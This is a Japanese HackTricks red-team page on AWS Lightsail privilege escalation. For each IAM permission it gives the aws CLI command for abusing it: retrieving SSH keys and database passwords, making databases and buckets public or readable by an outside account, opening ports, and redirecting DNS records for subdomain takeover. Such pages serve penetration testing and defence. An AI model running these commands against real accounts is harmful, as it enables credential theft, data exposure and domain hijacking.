AWS - Lightsail Privesc

htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学びましょう

HackTricks をサポートする他の方法:

Lightsail

Lightsailに関する詳細情報は、以下をチェックしてください:

pageAWS - Lightsail Enum

重要な点として、Lightsailはユーザーに属するIAMロールを使用しないことに注意する必要がありますが、AWSが管理するアカウントに属するため、このサービスを使用して特権昇格を行うことはできません。ただし、コード、APIキー、およびデータベース情報などの機密データがこのサービスに見つかる可能性があります。

lightsail:DownloadDefaultKeyPair

この権限を持つと、インスタンスにアクセスするためのSSHキーを取得できます。

aws lightsail download-default-key-pair

潜在的影響: インスタンス内の機密情報を見つけることができます。

lightsail:GetInstanceAccessDetails

この権限を持つと、インスタンスにアクセスするためのSSHキーを生成できます。

aws lightsail get-instance-access-details --instance-name <instance_name>

潜在的影響: インスタンス内の機密情報を見つけることができます。

lightsail:CreateBucketAccessKey

この権限を持つと、バケットにアクセスするためのキーを取得できます。

aws lightsail create-bucket-access-key --bucket-name <name>

潜在的影響: バケット内の機密情報を見つけることができます。

lightsail:GetRelationalDatabaseMasterUserPassword

この権限を持つと、データベースへのアクセス資格情報を取得できます。

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

潜在的影響: データベース内の機密情報を見つけることができます。

lightsail:UpdateRelationalDatabase

この権限を使用すると、データベースへのアクセスパスワードを変更できます:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

データベースが公開されていない場合は、この権限で公開することもできます。

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

潜在的影響: データベース内で機密情報を見つける可能性があります。

lightsail:OpenInstancePublicPorts

この権限はインターネットにポートを公開することを許可します。

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

潜在的影響: 機密ポートへのアクセス。

lightsail:PutInstancePublicPorts

この権限は、インターネットにポートを公開することを許可します。指定されていないポートは閉じられます。

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

潜在的影響: 機密ポートへのアクセス。

lightsail:SetResourceAccessForBucket

この権限を使用すると、追加の資格情報なしでインスタンスにバケットへのアクセスを許可できます。

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

潜在的影響: 機密情報を含むバケットへの新しいアクセス権の可能性。

lightsail:UpdateBucket

この権限を持つと、攻撃者は自分のAWSアカウントに対してバケットへの読み取りアクセス権を付与したり、バケットを誰でもアクセス可能にすることができます。

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

潜在的影響: 機密情報を含むバケツへの新しいアクセスが可能になる可能性があります。

lightsail:UpdateContainerService

この権限を持つ攻撃者は、コンテナサービスからプライベートECRへのアクセスを許可できます。

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

潜在的影響: プライベートECRから機密情報を取得する

lightsail:CreateDomainEntry

この権限を持つ攻撃者は、サブドメインを作成し、それを自分のIPアドレスにポイントする(サブドメイン乗っ取り)、またはドメインからの電子メールのスプーフィングを許可するSPFレコードを作成したり、メインドメインを自分のIPアドレスに設定することさえできます。

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

潜在的影響: ドメインの乗っ取り

lightsail:UpdateDomainEntry

この権限を持つ攻撃者は、サブドメインを作成し、それを自分のIPアドレスに向ける(サブドメイン乗っ取り)、または自分のIPアドレスからの電子メールを許可するSPFレコードを作成したり、さらにはメインドメインを自分のIPアドレスに設定することができます。

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

潜在的影響: ドメインの乗っ取り

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

最終更新